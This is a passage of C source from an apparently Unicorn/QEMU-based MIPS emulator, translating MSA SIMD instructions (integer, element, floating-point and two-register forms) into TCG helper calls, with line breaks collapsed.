gen_helper_msa_min_u_w(tcg_ctx, tcg_ctx->cpu_env, twd, tws, twt); break; case DF_DOUBLE: gen_helper_msa_min_u_d(tcg_ctx, tcg_ctx->cpu_env, twd, tws, twt); break; } break; case OPC_MOD_S_df: switch (df) { case DF_BYTE: gen_helper_msa_mod_s_b(tcg_ctx, tcg_ctx->cpu_env, twd, tws, twt); break; case DF_HALF: gen_helper_msa_mod_s_h(tcg_ctx, tcg_ctx->cpu_env, twd, tws, twt); break; case DF_WORD: gen_helper_msa_mod_s_w(tcg_ctx, tcg_ctx->cpu_env, twd, tws, twt); break; case DF_DOUBLE: gen_helper_msa_mod_s_d(tcg_ctx, tcg_ctx->cpu_env, twd, tws, twt); break; } break; case OPC_MOD_U_df: switch (df) { case DF_BYTE: gen_helper_msa_mod_u_b(tcg_ctx, tcg_ctx->cpu_env, twd, tws, twt); break; case DF_HALF: gen_helper_msa_mod_u_h(tcg_ctx, tcg_ctx->cpu_env, twd, tws, twt); break; case DF_WORD: gen_helper_msa_mod_u_w(tcg_ctx, tcg_ctx->cpu_env, twd, tws, twt); break; case DF_DOUBLE: gen_helper_msa_mod_u_d(tcg_ctx, tcg_ctx->cpu_env, twd, tws, twt); break; } break; case OPC_ASUB_S_df: switch (df) { case DF_BYTE: gen_helper_msa_asub_s_b(tcg_ctx, tcg_ctx->cpu_env, twd, tws, twt); break; case DF_HALF: gen_helper_msa_asub_s_h(tcg_ctx, tcg_ctx->cpu_env, twd, tws, twt); break; case DF_WORD: gen_helper_msa_asub_s_w(tcg_ctx, tcg_ctx->cpu_env, twd, tws, twt); break; case DF_DOUBLE: gen_helper_msa_asub_s_d(tcg_ctx, tcg_ctx->cpu_env, twd, tws, twt); break; } break; case OPC_ASUB_U_df: switch (df) { case DF_BYTE: gen_helper_msa_asub_u_b(tcg_ctx, tcg_ctx->cpu_env, twd, tws, twt); break; case DF_HALF: gen_helper_msa_asub_u_h(tcg_ctx, tcg_ctx->cpu_env, twd, tws, twt); break; case DF_WORD: gen_helper_msa_asub_u_w(tcg_ctx, tcg_ctx->cpu_env, twd, tws, twt); break; case DF_DOUBLE: gen_helper_msa_asub_u_d(tcg_ctx, tcg_ctx->cpu_env, twd, tws, twt); break; } break; case OPC_ILVEV_df: switch (df) { case DF_BYTE: gen_helper_msa_ilvev_b(tcg_ctx, tcg_ctx->cpu_env, twd, tws, twt); break; case DF_HALF: gen_helper_msa_ilvev_h(tcg_ctx, tcg_ctx->cpu_env, twd, tws, twt); break; case DF_WORD: gen_helper_msa_ilvev_w(tcg_ctx, tcg_ctx->cpu_env, twd, tws, twt); break; case DF_DOUBLE: gen_helper_msa_ilvev_d(tcg_ctx, tcg_ctx->cpu_env, twd, tws, twt); break; } break; case OPC_ILVOD_df: switch (df) { case DF_BYTE: gen_helper_msa_ilvod_b(tcg_ctx, tcg_ctx->cpu_env, twd, tws, twt); break; case DF_HALF: gen_helper_msa_ilvod_h(tcg_ctx, tcg_ctx->cpu_env, twd, tws, twt); break; case DF_WORD: gen_helper_msa_ilvod_w(tcg_ctx, tcg_ctx->cpu_env, twd, tws, twt); break; case DF_DOUBLE: gen_helper_msa_ilvod_d(tcg_ctx, tcg_ctx->cpu_env, twd, tws, twt); break; } break; case OPC_ILVL_df: switch (df) { case DF_BYTE: gen_helper_msa_ilvl_b(tcg_ctx, tcg_ctx->cpu_env, twd, tws, twt); break; case DF_HALF: gen_helper_msa_ilvl_h(tcg_ctx, tcg_ctx->cpu_env, twd, tws, twt); break; case DF_WORD: gen_helper_msa_ilvl_w(tcg_ctx, tcg_ctx->cpu_env, twd, tws, twt); break; case DF_DOUBLE: gen_helper_msa_ilvl_d(tcg_ctx, tcg_ctx->cpu_env, twd, tws, twt); break; } break; case OPC_ILVR_df: switch (df) { case DF_BYTE: gen_helper_msa_ilvr_b(tcg_ctx, tcg_ctx->cpu_env, twd, tws, twt); break; case DF_HALF: gen_helper_msa_ilvr_h(tcg_ctx, tcg_ctx->cpu_env, twd, tws, twt); break; case DF_WORD: gen_helper_msa_ilvr_w(tcg_ctx, tcg_ctx->cpu_env, twd, tws, twt); break; case DF_DOUBLE: gen_helper_msa_ilvr_d(tcg_ctx, tcg_ctx->cpu_env, twd, tws, twt); break; } break; case OPC_PCKEV_df: switch (df) { case DF_BYTE: gen_helper_msa_pckev_b(tcg_ctx, tcg_ctx->cpu_env, twd, tws, twt); break; case DF_HALF: gen_helper_msa_pckev_h(tcg_ctx, tcg_ctx->cpu_env, twd, tws, twt); break; case DF_WORD: 
gen_helper_msa_pckev_w(tcg_ctx, tcg_ctx->cpu_env, twd, tws, twt); break; case DF_DOUBLE: gen_helper_msa_pckev_d(tcg_ctx, tcg_ctx->cpu_env, twd, tws, twt); break; } break; case OPC_PCKOD_df: switch (df) { case DF_BYTE: gen_helper_msa_pckod_b(tcg_ctx, tcg_ctx->cpu_env, twd, tws, twt); break; case DF_HALF: gen_helper_msa_pckod_h(tcg_ctx, tcg_ctx->cpu_env, twd, tws, twt); break; case DF_WORD: gen_helper_msa_pckod_w(tcg_ctx, tcg_ctx->cpu_env, twd, tws, twt); break; case DF_DOUBLE: gen_helper_msa_pckod_d(tcg_ctx, tcg_ctx->cpu_env, twd, tws, twt); break; } break; case OPC_SLL_df: switch (df) { case DF_BYTE: gen_helper_msa_sll_b(tcg_ctx, tcg_ctx->cpu_env, twd, tws, twt); break; case DF_HALF: gen_helper_msa_sll_h(tcg_ctx, tcg_ctx->cpu_env, twd, tws, twt); break; case DF_WORD: gen_helper_msa_sll_w(tcg_ctx, tcg_ctx->cpu_env, twd, tws, twt); break; case DF_DOUBLE: gen_helper_msa_sll_d(tcg_ctx, tcg_ctx->cpu_env, twd, tws, twt); break; } break; case OPC_SRA_df: switch (df) { case DF_BYTE: gen_helper_msa_sra_b(tcg_ctx, tcg_ctx->cpu_env, twd, tws, twt); break; case DF_HALF: gen_helper_msa_sra_h(tcg_ctx, tcg_ctx->cpu_env, twd, tws, twt); break; case DF_WORD: gen_helper_msa_sra_w(tcg_ctx, tcg_ctx->cpu_env, twd, tws, twt); break; case DF_DOUBLE: gen_helper_msa_sra_d(tcg_ctx, tcg_ctx->cpu_env, twd, tws, twt); break; } break; case OPC_SRAR_df: switch (df) { case DF_BYTE: gen_helper_msa_srar_b(tcg_ctx, tcg_ctx->cpu_env, twd, tws, twt); break; case DF_HALF: gen_helper_msa_srar_h(tcg_ctx, tcg_ctx->cpu_env, twd, tws, twt); break; case DF_WORD: gen_helper_msa_srar_w(tcg_ctx, tcg_ctx->cpu_env, twd, tws, twt); break; case DF_DOUBLE: gen_helper_msa_srar_d(tcg_ctx, tcg_ctx->cpu_env, twd, tws, twt); break; } break; case OPC_SRL_df: switch (df) { case DF_BYTE: gen_helper_msa_srl_b(tcg_ctx, tcg_ctx->cpu_env, twd, tws, twt); break; case DF_HALF: gen_helper_msa_srl_h(tcg_ctx, tcg_ctx->cpu_env, twd, tws, twt); break; case DF_WORD: gen_helper_msa_srl_w(tcg_ctx, tcg_ctx->cpu_env, twd, tws, twt); break; case DF_DOUBLE: gen_helper_msa_srl_d(tcg_ctx, tcg_ctx->cpu_env, twd, tws, twt); break; } break; case OPC_SRLR_df: switch (df) { case DF_BYTE: gen_helper_msa_srlr_b(tcg_ctx, tcg_ctx->cpu_env, twd, tws, twt); break; case DF_HALF: gen_helper_msa_srlr_h(tcg_ctx, tcg_ctx->cpu_env, twd, tws, twt); break; case DF_WORD: gen_helper_msa_srlr_w(tcg_ctx, tcg_ctx->cpu_env, twd, tws, twt); break; case DF_DOUBLE: gen_helper_msa_srlr_d(tcg_ctx, tcg_ctx->cpu_env, twd, tws, twt); break; } break; case OPC_SUBS_S_df: gen_helper_msa_subs_s_df(tcg_ctx, tcg_ctx->cpu_env, tdf, twd, tws, twt); break; case OPC_MULV_df: gen_helper_msa_mulv_df(tcg_ctx, tcg_ctx->cpu_env, tdf, twd, tws, twt); break; case OPC_SLD_df: gen_helper_msa_sld_df(tcg_ctx, tcg_ctx->cpu_env, tdf, twd, tws, twt); break; case OPC_VSHF_df: gen_helper_msa_vshf_df(tcg_ctx, tcg_ctx->cpu_env, tdf, twd, tws, twt); break; case OPC_SUBV_df: gen_helper_msa_subv_df(tcg_ctx, tcg_ctx->cpu_env, tdf, twd, tws, twt); break; case OPC_SUBS_U_df: gen_helper_msa_subs_u_df(tcg_ctx, tcg_ctx->cpu_env, tdf, twd, tws, twt); break; case OPC_MADDV_df: gen_helper_msa_maddv_df(tcg_ctx, tcg_ctx->cpu_env, tdf, twd, tws, twt); break; case OPC_SPLAT_df: gen_helper_msa_splat_df(tcg_ctx, tcg_ctx->cpu_env, tdf, twd, tws, twt); break; case OPC_SUBSUS_U_df: gen_helper_msa_subsus_u_df(tcg_ctx, tcg_ctx->cpu_env, tdf, twd, tws, twt); break; case OPC_MSUBV_df: gen_helper_msa_msubv_df(tcg_ctx, tcg_ctx->cpu_env, tdf, twd, tws, twt); break; case OPC_SUBSUU_S_df: gen_helper_msa_subsuu_s_df(tcg_ctx, tcg_ctx->cpu_env, tdf, twd, tws, 
twt); break; case OPC_DOTP_S_df: case OPC_DOTP_U_df: case OPC_DPADD_S_df: case OPC_DPADD_U_df: case OPC_DPSUB_S_df: case OPC_HADD_S_df: case OPC_DPSUB_U_df: case OPC_HADD_U_df: case OPC_HSUB_S_df: case OPC_HSUB_U_df: if (df == DF_BYTE) { generate_exception_end(ctx, EXCP_RI); break; } switch (MASK_MSA_3R(ctx->opcode)) { case OPC_HADD_S_df: switch (df) { case DF_HALF: gen_helper_msa_hadd_s_h(tcg_ctx, tcg_ctx->cpu_env, twd, tws, twt); break; case DF_WORD: gen_helper_msa_hadd_s_w(tcg_ctx, tcg_ctx->cpu_env, twd, tws, twt); break; case DF_DOUBLE: gen_helper_msa_hadd_s_d(tcg_ctx, tcg_ctx->cpu_env, twd, tws, twt); break; } break; case OPC_HADD_U_df: switch (df) { case DF_HALF: gen_helper_msa_hadd_u_h(tcg_ctx, tcg_ctx->cpu_env, twd, tws, twt); break; case DF_WORD: gen_helper_msa_hadd_u_w(tcg_ctx, tcg_ctx->cpu_env, twd, tws, twt); break; case DF_DOUBLE: gen_helper_msa_hadd_u_d(tcg_ctx, tcg_ctx->cpu_env, twd, tws, twt); break; } break; case OPC_HSUB_S_df: switch (df) { case DF_HALF: gen_helper_msa_hsub_s_h(tcg_ctx, tcg_ctx->cpu_env, twd, tws, twt); break; case DF_WORD: gen_helper_msa_hsub_s_w(tcg_ctx, tcg_ctx->cpu_env, twd, tws, twt); break; case DF_DOUBLE: gen_helper_msa_hsub_s_d(tcg_ctx, tcg_ctx->cpu_env, twd, tws, twt); break; } break; case OPC_HSUB_U_df: switch (df) { case DF_HALF: gen_helper_msa_hsub_u_h(tcg_ctx, tcg_ctx->cpu_env, twd, tws, twt); break; case DF_WORD: gen_helper_msa_hsub_u_w(tcg_ctx, tcg_ctx->cpu_env, twd, tws, twt); break; case DF_DOUBLE: gen_helper_msa_hsub_u_d(tcg_ctx, tcg_ctx->cpu_env, twd, tws, twt); break; } break; case OPC_DOTP_S_df: gen_helper_msa_dotp_s_df(tcg_ctx, tcg_ctx->cpu_env, tdf, twd, tws, twt); break; case OPC_DOTP_U_df: gen_helper_msa_dotp_u_df(tcg_ctx, tcg_ctx->cpu_env, tdf, twd, tws, twt); break; case OPC_DPADD_S_df: gen_helper_msa_dpadd_s_df(tcg_ctx, tcg_ctx->cpu_env, tdf, twd, tws, twt); break; case OPC_DPADD_U_df: gen_helper_msa_dpadd_u_df(tcg_ctx, tcg_ctx->cpu_env, tdf, twd, tws, twt); break; case OPC_DPSUB_S_df: gen_helper_msa_dpsub_s_df(tcg_ctx, tcg_ctx->cpu_env, tdf, twd, tws, twt); break; case OPC_DPSUB_U_df: gen_helper_msa_dpsub_u_df(tcg_ctx, tcg_ctx->cpu_env, tdf, twd, tws, twt); break; } break; default: MIPS_INVAL("MSA instruction"); generate_exception_end(ctx, EXCP_RI); break; } tcg_temp_free_i32(tcg_ctx, twd); tcg_temp_free_i32(tcg_ctx, tws); tcg_temp_free_i32(tcg_ctx, twt); tcg_temp_free_i32(tcg_ctx, tdf); } static void gen_msa_elm_3e(CPUMIPSState *env, DisasContext *ctx) { TCGContext *tcg_ctx = ctx->uc->tcg_ctx; #define MASK_MSA_ELM_DF3E(op) (MASK_MSA_MINOR(op) | (op & (0x3FF << 16))) uint8_t source = (ctx->opcode >> 11) & 0x1f; uint8_t dest = (ctx->opcode >> 6) & 0x1f; TCGv telm = tcg_temp_new(tcg_ctx); TCGv_i32 tsr = tcg_const_i32(tcg_ctx, source); TCGv_i32 tdt = tcg_const_i32(tcg_ctx, dest); switch (MASK_MSA_ELM_DF3E(ctx->opcode)) { case OPC_CTCMSA: gen_load_gpr(tcg_ctx, telm, source); gen_helper_msa_ctcmsa(tcg_ctx, tcg_ctx->cpu_env, telm, tdt); break; case OPC_CFCMSA: gen_helper_msa_cfcmsa(tcg_ctx, telm, tcg_ctx->cpu_env, tsr); gen_store_gpr(tcg_ctx, telm, dest); break; case OPC_MOVE_V: gen_helper_msa_move_v(tcg_ctx, tcg_ctx->cpu_env, tdt, tsr); break; default: MIPS_INVAL("MSA instruction"); generate_exception_end(ctx, EXCP_RI); break; } tcg_temp_free(tcg_ctx, telm); tcg_temp_free_i32(tcg_ctx, tdt); tcg_temp_free_i32(tcg_ctx, tsr); } static void gen_msa_elm_df(CPUMIPSState *env, DisasContext *ctx, uint32_t df, uint32_t n) { TCGContext *tcg_ctx = ctx->uc->tcg_ctx; #define MASK_MSA_ELM(op) (MASK_MSA_MINOR(op) | (op & (0xf << 22))) uint8_t ws 
= (ctx->opcode >> 11) & 0x1f; uint8_t wd = (ctx->opcode >> 6) & 0x1f; TCGv_i32 tws = tcg_const_i32(tcg_ctx, ws); TCGv_i32 twd = tcg_const_i32(tcg_ctx, wd); TCGv_i32 tn = tcg_const_i32(tcg_ctx, n); TCGv_i32 tdf = tcg_const_i32(tcg_ctx, df); switch (MASK_MSA_ELM(ctx->opcode)) { case OPC_SLDI_df: gen_helper_msa_sldi_df(tcg_ctx, tcg_ctx->cpu_env, tdf, twd, tws, tn); break; case OPC_SPLATI_df: gen_helper_msa_splati_df(tcg_ctx, tcg_ctx->cpu_env, tdf, twd, tws, tn); break; case OPC_INSVE_df: gen_helper_msa_insve_df(tcg_ctx, tcg_ctx->cpu_env, tdf, twd, tws, tn); break; case OPC_COPY_S_df: case OPC_COPY_U_df: case OPC_INSERT_df: #if !defined(TARGET_MIPS64) /* Double format valid only for MIPS64 */ if (df == DF_DOUBLE) { generate_exception_end(ctx, EXCP_RI); break; } if ((MASK_MSA_ELM(ctx->opcode) == OPC_COPY_U_df) && (df == DF_WORD)) { generate_exception_end(ctx, EXCP_RI); break; } #endif switch (MASK_MSA_ELM(ctx->opcode)) { case OPC_COPY_S_df: if (likely(wd != 0)) { switch (df) { case DF_BYTE: gen_helper_msa_copy_s_b(tcg_ctx, tcg_ctx->cpu_env, twd, tws, tn); break; case DF_HALF: gen_helper_msa_copy_s_h(tcg_ctx, tcg_ctx->cpu_env, twd, tws, tn); break; case DF_WORD: gen_helper_msa_copy_s_w(tcg_ctx, tcg_ctx->cpu_env, twd, tws, tn); break; #if defined(TARGET_MIPS64) case DF_DOUBLE: gen_helper_msa_copy_s_d(tcg_ctx, tcg_ctx->cpu_env, twd, tws, tn); break; #endif default: assert(0); } } break; case OPC_COPY_U_df: if (likely(wd != 0)) { switch (df) { case DF_BYTE: gen_helper_msa_copy_u_b(tcg_ctx, tcg_ctx->cpu_env, twd, tws, tn); break; case DF_HALF: gen_helper_msa_copy_u_h(tcg_ctx, tcg_ctx->cpu_env, twd, tws, tn); break; #if defined(TARGET_MIPS64) case DF_WORD: gen_helper_msa_copy_u_w(tcg_ctx, tcg_ctx->cpu_env, twd, tws, tn); break; #endif default: assert(0); } } break; case OPC_INSERT_df: switch (df) { case DF_BYTE: gen_helper_msa_insert_b(tcg_ctx, tcg_ctx->cpu_env, twd, tws, tn); break; case DF_HALF: gen_helper_msa_insert_h(tcg_ctx, tcg_ctx->cpu_env, twd, tws, tn); break; case DF_WORD: gen_helper_msa_insert_w(tcg_ctx, tcg_ctx->cpu_env, twd, tws, tn); break; #if defined(TARGET_MIPS64) case DF_DOUBLE: gen_helper_msa_insert_d(tcg_ctx, tcg_ctx->cpu_env, twd, tws, tn); break; #endif default: assert(0); } break; } break; default: MIPS_INVAL("MSA instruction"); generate_exception_end(ctx, EXCP_RI); } tcg_temp_free_i32(tcg_ctx, twd); tcg_temp_free_i32(tcg_ctx, tws); tcg_temp_free_i32(tcg_ctx, tn); tcg_temp_free_i32(tcg_ctx, tdf); } static void gen_msa_elm(CPUMIPSState *env, DisasContext *ctx) { uint8_t dfn = (ctx->opcode >> 16) & 0x3f; uint32_t df = 0, n = 0; if ((dfn & 0x30) == 0x00) { n = dfn & 0x0f; df = DF_BYTE; } else if ((dfn & 0x38) == 0x20) { n = dfn & 0x07; df = DF_HALF; } else if ((dfn & 0x3c) == 0x30) { n = dfn & 0x03; df = DF_WORD; } else if ((dfn & 0x3e) == 0x38) { n = dfn & 0x01; df = DF_DOUBLE; } else if (dfn == 0x3E) { /* CTCMSA, CFCMSA, MOVE.V */ gen_msa_elm_3e(env, ctx); return; } else { generate_exception_end(ctx, EXCP_RI); return; } gen_msa_elm_df(env, ctx, df, n); } static void gen_msa_3rf(CPUMIPSState *env, DisasContext *ctx) { TCGContext *tcg_ctx = ctx->uc->tcg_ctx; #define MASK_MSA_3RF(op) (MASK_MSA_MINOR(op) | (op & (0xf << 22))) uint8_t df = (ctx->opcode >> 21) & 0x1; uint8_t wt = (ctx->opcode >> 16) & 0x1f; uint8_t ws = (ctx->opcode >> 11) & 0x1f; uint8_t wd = (ctx->opcode >> 6) & 0x1f; TCGv_i32 twd = tcg_const_i32(tcg_ctx, wd); TCGv_i32 tws = tcg_const_i32(tcg_ctx, ws); TCGv_i32 twt = tcg_const_i32(tcg_ctx, wt); TCGv_i32 tdf = tcg_temp_new_i32(tcg_ctx); /* adjust df value for 
floating-point instruction */ tcg_gen_movi_i32(tcg_ctx, tdf, df + 2); switch (MASK_MSA_3RF(ctx->opcode)) { case OPC_FCAF_df: gen_helper_msa_fcaf_df(tcg_ctx, tcg_ctx->cpu_env, tdf, twd, tws, twt); break; case OPC_FADD_df: gen_helper_msa_fadd_df(tcg_ctx, tcg_ctx->cpu_env, tdf, twd, tws, twt); break; case OPC_FCUN_df: gen_helper_msa_fcun_df(tcg_ctx, tcg_ctx->cpu_env, tdf, twd, tws, twt); break; case OPC_FSUB_df: gen_helper_msa_fsub_df(tcg_ctx, tcg_ctx->cpu_env, tdf, twd, tws, twt); break; case OPC_FCOR_df: gen_helper_msa_fcor_df(tcg_ctx, tcg_ctx->cpu_env, tdf, twd, tws, twt); break; case OPC_FCEQ_df: gen_helper_msa_fceq_df(tcg_ctx, tcg_ctx->cpu_env, tdf, twd, tws, twt); break; case OPC_FMUL_df: gen_helper_msa_fmul_df(tcg_ctx, tcg_ctx->cpu_env, tdf, twd, tws, twt); break; case OPC_FCUNE_df: gen_helper_msa_fcune_df(tcg_ctx, tcg_ctx->cpu_env, tdf, twd, tws, twt); break; case OPC_FCUEQ_df: gen_helper_msa_fcueq_df(tcg_ctx, tcg_ctx->cpu_env, tdf, twd, tws, twt); break; case OPC_FDIV_df: gen_helper_msa_fdiv_df(tcg_ctx, tcg_ctx->cpu_env, tdf, twd, tws, twt); break; case OPC_FCNE_df: gen_helper_msa_fcne_df(tcg_ctx, tcg_ctx->cpu_env, tdf, twd, tws, twt); break; case OPC_FCLT_df: gen_helper_msa_fclt_df(tcg_ctx, tcg_ctx->cpu_env, tdf, twd, tws, twt); break; case OPC_FMADD_df: gen_helper_msa_fmadd_df(tcg_ctx, tcg_ctx->cpu_env, tdf, twd, tws, twt); break; case OPC_MUL_Q_df: tcg_gen_movi_i32(tcg_ctx, tdf, df + 1); gen_helper_msa_mul_q_df(tcg_ctx, tcg_ctx->cpu_env, tdf, twd, tws, twt); break; case OPC_FCULT_df: gen_helper_msa_fcult_df(tcg_ctx, tcg_ctx->cpu_env, tdf, twd, tws, twt); break; case OPC_FMSUB_df: gen_helper_msa_fmsub_df(tcg_ctx, tcg_ctx->cpu_env, tdf, twd, tws, twt); break; case OPC_MADD_Q_df: tcg_gen_movi_i32(tcg_ctx, tdf, df + 1); gen_helper_msa_madd_q_df(tcg_ctx, tcg_ctx->cpu_env, tdf, twd, tws, twt); break; case OPC_FCLE_df: gen_helper_msa_fcle_df(tcg_ctx, tcg_ctx->cpu_env, tdf, twd, tws, twt); break; case OPC_MSUB_Q_df: tcg_gen_movi_i32(tcg_ctx, tdf, df + 1); gen_helper_msa_msub_q_df(tcg_ctx, tcg_ctx->cpu_env, tdf, twd, tws, twt); break; case OPC_FCULE_df: gen_helper_msa_fcule_df(tcg_ctx, tcg_ctx->cpu_env, tdf, twd, tws, twt); break; case OPC_FEXP2_df: gen_helper_msa_fexp2_df(tcg_ctx, tcg_ctx->cpu_env, tdf, twd, tws, twt); break; case OPC_FSAF_df: gen_helper_msa_fsaf_df(tcg_ctx, tcg_ctx->cpu_env, tdf, twd, tws, twt); break; case OPC_FEXDO_df: gen_helper_msa_fexdo_df(tcg_ctx, tcg_ctx->cpu_env, tdf, twd, tws, twt); break; case OPC_FSUN_df: gen_helper_msa_fsun_df(tcg_ctx, tcg_ctx->cpu_env, tdf, twd, tws, twt); break; case OPC_FSOR_df: gen_helper_msa_fsor_df(tcg_ctx, tcg_ctx->cpu_env, tdf, twd, tws, twt); break; case OPC_FSEQ_df: gen_helper_msa_fseq_df(tcg_ctx, tcg_ctx->cpu_env, tdf, twd, tws, twt); break; case OPC_FTQ_df: gen_helper_msa_ftq_df(tcg_ctx, tcg_ctx->cpu_env, tdf, twd, tws, twt); break; case OPC_FSUNE_df: gen_helper_msa_fsune_df(tcg_ctx, tcg_ctx->cpu_env, tdf, twd, tws, twt); break; case OPC_FSUEQ_df: gen_helper_msa_fsueq_df(tcg_ctx, tcg_ctx->cpu_env, tdf, twd, tws, twt); break; case OPC_FSNE_df: gen_helper_msa_fsne_df(tcg_ctx, tcg_ctx->cpu_env, tdf, twd, tws, twt); break; case OPC_FSLT_df: gen_helper_msa_fslt_df(tcg_ctx, tcg_ctx->cpu_env, tdf, twd, tws, twt); break; case OPC_FMIN_df: gen_helper_msa_fmin_df(tcg_ctx, tcg_ctx->cpu_env, tdf, twd, tws, twt); break; case OPC_MULR_Q_df: tcg_gen_movi_i32(tcg_ctx, tdf, df + 1); gen_helper_msa_mulr_q_df(tcg_ctx, tcg_ctx->cpu_env, tdf, twd, tws, twt); break; case OPC_FSULT_df: gen_helper_msa_fsult_df(tcg_ctx, tcg_ctx->cpu_env, tdf, twd, tws, 
twt); break; case OPC_FMIN_A_df: gen_helper_msa_fmin_a_df(tcg_ctx, tcg_ctx->cpu_env, tdf, twd, tws, twt); break; case OPC_MADDR_Q_df: tcg_gen_movi_i32(tcg_ctx, tdf, df + 1); gen_helper_msa_maddr_q_df(tcg_ctx, tcg_ctx->cpu_env, tdf, twd, tws, twt); break; case OPC_FSLE_df: gen_helper_msa_fsle_df(tcg_ctx, tcg_ctx->cpu_env, tdf, twd, tws, twt); break; case OPC_FMAX_df: gen_helper_msa_fmax_df(tcg_ctx, tcg_ctx->cpu_env, tdf, twd, tws, twt); break; case OPC_MSUBR_Q_df: tcg_gen_movi_i32(tcg_ctx, tdf, df + 1); gen_helper_msa_msubr_q_df(tcg_ctx, tcg_ctx->cpu_env, tdf, twd, tws, twt); break; case OPC_FSULE_df: gen_helper_msa_fsule_df(tcg_ctx, tcg_ctx->cpu_env, tdf, twd, tws, twt); break; case OPC_FMAX_A_df: gen_helper_msa_fmax_a_df(tcg_ctx, tcg_ctx->cpu_env, tdf, twd, tws, twt); break; default: MIPS_INVAL("MSA instruction"); generate_exception_end(ctx, EXCP_RI); break; } tcg_temp_free_i32(tcg_ctx, twd); tcg_temp_free_i32(tcg_ctx, tws); tcg_temp_free_i32(tcg_ctx, twt); tcg_temp_free_i32(tcg_ctx, tdf); } static void gen_msa_2r(CPUMIPSState *env, DisasContext *ctx) { TCGContext *tcg_ctx = ctx->uc->tcg_ctx; #define MASK_MSA_2R(op) (MASK_MSA_MINOR(op) | (op & (0x1f << 21)) | \ (op & (0x7 << 18))) uint8_t wt = (ctx->opcode >> 16) & 0x1f; uint8_t ws = (ctx->opcode >> 11) & 0x1f; uint8_t wd = (ctx->opcode >> 6) & 0x1f; uint8_t df = (ctx->opcode >> 16) & 0x3; TCGv_i32 twd = tcg_const_i32(tcg_ctx, wd); TCGv_i32 tws = tcg_const_i32(tcg_ctx, ws); TCGv_i32 twt = tcg_const_i32(tcg_ctx, wt); TCGv_i32 tdf = tcg_const_i32(tcg_ctx, df); switch (MASK_MSA_2R(ctx->opcode)) { case OPC_FILL_df: #if !defined(TARGET_MIPS64) /* Double format valid only for MIPS64 */ if (df == DF_DOUBLE) { generate_exception_end(ctx, EXCP_RI); break; } #endif gen_helper_msa_fill_df(tcg_ctx, tcg_ctx->cpu_env, tdf, twd, tws); /* trs */ break; case OPC_NLOC_df: switch (df) { case DF_BYTE: gen_helper_msa_nloc_b(tcg_ctx, tcg_ctx->cpu_env, twd, tws); break; case DF_HALF: gen_helper_msa_nloc_h(tcg_ctx, tcg_ctx->cpu_env, twd, tws); break; case DF_WORD: gen_helper_msa_nloc_w(tcg_ctx, tcg_ctx->cpu_env, twd, tws); break; case DF_DOUBLE: gen_helper_msa_nloc_d(tcg_ctx, tcg_ctx->cpu_env, twd, tws); break; } break; case OPC_NLZC_df: switch (df) { case DF_BYTE: gen_helper_msa_nlzc_b(tcg_ctx, tcg_ctx->cpu_env, twd, tws); break; case DF_HALF: gen_helper_msa_nlzc_h(tcg_ctx, tcg_ctx->cpu_env, twd, tws); break; case DF_WORD: gen_helper_msa_nlzc_w(tcg_ctx, tcg_ctx->cpu_env, twd, tws); break; case DF_DOUBLE: gen_helper_msa_nlzc_d(tcg_ctx, tcg_ctx->cpu_env, twd, tws); break; } break; case OPC_PCNT_df: switch (df) { case DF_BYTE: gen_helper_msa_pcnt_b(tcg_ctx, tcg_ctx->cpu_env, twd, tws); break; case DF_HALF: gen_helper_msa_pcnt_h(tcg_ctx, tcg_ctx->cpu_env, twd, tws); break; case DF_WORD: gen_helper_msa_pcnt_w(tcg_ctx, tcg_ctx->cpu_env, twd, tws); break; case DF_DOUBLE: gen_helper_msa_pcnt_d(tcg_ctx, tcg_ctx->cpu_env, twd, tws); break; } break; default: MIPS_INVAL("MSA instruction"); generate_exception_end(ctx, EXCP_RI); break; } tcg_temp_free_i32(tcg_ctx, twd); tcg_temp_free_i32(tcg_ctx, tws); tcg_temp_free_i32(tcg_ctx, twt); tcg_temp_free_i32(tcg_ctx, tdf); } static void gen_msa_2rf(CPUMIPSState *env, DisasContext *ctx) { TCGContext *tcg_ctx = ctx->uc->tcg_ctx; #define MASK_MSA_2RF(op) (MASK_MSA_MINOR(op) | (op & (0x1f << 21)) | \ (op & (0xf << 17))) uint8_t wt = (ctx->opcode >> 16) & 0x1f; uint8_t ws = (ctx->opcode >> 11) & 0x1f; uint8_t wd = (ctx->opcode >> 6) & 0x1f; uint8_t df = (ctx->opcode >> 16) & 0x1; TCGv_i32 twd = tcg_const_i32(tcg_ctx, wd); TCGv_i32 tws 
= tcg_const_i32(tcg_ctx, ws); TCGv_i32 twt = tcg_const_i32(tcg_ctx, wt); /* adjust df value for floating-point instruction */ TCGv_i32 tdf = tcg_const_i32(tcg_ctx, df + 2); switch (MASK_MSA_2RF(ctx->opcode)) { case OPC_FCLASS_df: gen_helper_msa_fclass_df(tcg_ctx, tcg_ctx->cpu_env, tdf, twd, tws); break; case OPC_FTRUNC_S_df: gen_helper_msa_ftrunc_s_df(tcg_ctx, tcg_ctx->cpu_env, tdf, twd, tws); break; case OPC_FTRUNC_U_df: gen_helper_msa_ftrunc_u_df(tcg_ctx, tcg_ctx->cpu_env, tdf, twd, tws); break; case OPC_FSQRT_df: gen_helper_msa_fsqrt_df(tcg_ctx, tcg_ctx->cpu_env, tdf, twd, tws); break; case OPC_FRSQRT_df: gen_helper_msa_frsqrt_df(tcg_ctx, tcg_ctx->cpu_env, tdf, twd, tws); break; case OPC_FRCP_df: gen_helper_msa_frcp_df(tcg_ctx, tcg_ctx->cpu_env, tdf, twd, tws); break; case OPC_FRINT_df: gen_helper_msa_frint_df(tcg_ctx, tcg_ctx->cpu_env, tdf, twd, tws); break; case OPC_FLOG2_df: gen_helper_msa_flog2_df(tcg_ctx, tcg_ctx->cpu_env, tdf, twd, tws); break; case OPC_FEXUPL_df: gen_helper_msa_fexupl_df(tcg_ctx, tcg_ctx->cpu_env, tdf, twd, tws); break; case OPC_FEXUPR_df: gen_helper_msa_fexupr_df(tcg_ctx, tcg_ctx->cpu_env, tdf, twd, tws); break; case OPC_FFQL_df: gen_helper_msa_ffql_df(tcg_ctx, tcg_ctx->cpu_env, tdf, twd, tws); break; case OPC_FFQR_df: gen_helper_msa_ffqr_df(tcg_ctx, tcg_ctx->cpu_env, tdf, twd, tws); break; case OPC_FTINT_S_df: gen_helper_msa_ftint_s_df(tcg_ctx, tcg_ctx->cpu_env, tdf, twd, tws); break; case OPC_FTINT_U_df: gen_helper_msa_ftint_u_df(tcg_ctx, tcg_ctx->cpu_env, tdf, twd, tws); break; case OPC_FFINT_S_df: gen_helper_msa_ffint_s_df(tcg_ctx, tcg_ctx->cpu_env, tdf, twd, tws); break; case OPC_FFINT_U_df: gen_helper_msa_ffint_u_df(tcg_ctx, tcg_ctx->cpu_env, tdf, twd, 